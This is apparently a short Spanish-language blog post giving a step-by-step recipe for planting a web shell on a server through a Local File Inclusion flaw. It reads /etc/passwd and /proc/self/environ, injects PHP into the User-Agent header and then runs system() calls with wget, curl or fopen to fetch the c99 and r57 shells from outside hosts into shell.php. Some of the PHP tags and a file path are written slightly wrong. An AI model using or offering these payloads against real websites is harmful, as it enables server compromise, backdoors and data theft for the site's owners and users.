Howto: Subir una Shell Via Local File Inclusion

Howto: Subir una Shell Via Local File Inclusion 


  1. Identifique la vulnerabilidad LFI exponiendo /etc/passwd
  2. Si sirve cambie /etc/passwd a /proc/self/environment
  3. Agregue  ?phpinfo();? en el User-Agent 
  4. Si sirve agregue otro comando como
    1. uname -a
    2. id
  5.  Si sirve instale una shell con  
    1. ?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?>
    2. ?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?> 
    3. ?php $file=fopen("shell.php","w+"); $shell = fopen("http://www.c99shell.gen.tr/r57.txt","r"); while(!feof($shell)) { $shellfile .=fgets($shell);} fwrite($file,$shellfile); fclose($file);?>
 Finalmente visite la shell.

gracias, #jamesjara

0 pensamientos:

Post a Comment

feedback!